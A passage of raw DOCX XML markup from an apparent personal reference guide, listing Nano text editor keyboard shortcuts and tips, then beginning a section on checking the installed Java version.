      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + O</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Save (Write Out) the current file. You'll be prompted for a filename.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1275"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Exit Nano. You'll be prompted to save changes if unsaved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1275"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Insert another file into the current file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cursor Positioning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + _</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Go to a specific line and column. Enter the line number, press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then enter the column number.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="204"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + C</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Show the current cursor position (line and column).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034EA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cut, Copy, and Paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + Shift + C: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the selected text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + Shift + V: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Past the text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034ED">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + K</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cut the current line.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + ^</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Copy text. First, use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + 6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set a mark, then navigate to highlight text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Paste the cut/copied text.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Formatting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="763"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + J</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Justifies the selected paragraph.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="763"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Turn on/off line numbering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="763"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Enables "mark mode" for text selection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034F9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Miscellaneous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + G</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Opens Nano's built-in help menu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + Z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Suspends Nano (returns you to the shell; use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to resume Nano).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034FE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save and Exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + O</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Save changes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003500">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1213"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Exit Nano. If changes are unsaved, you'll be prompted to save or discard them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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02">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tips</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003503">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>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Ctrl + 6</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to set a mark for selecting text. Move the cursor to highlight, then use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + K</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to cut or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Alt + ^</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to copy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003504">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1484"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always save your changes with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + O</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before exiting with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl + X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003505">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Keep this guide handy for quick reference while editing!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003506">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000035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08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003509">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6ng43f23qhm" w:id="476"/>
      <w:bookmarkEnd w:id="476"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Java and .jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000350A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check Java version:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000350B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="602"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">java -version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000350C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000350D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
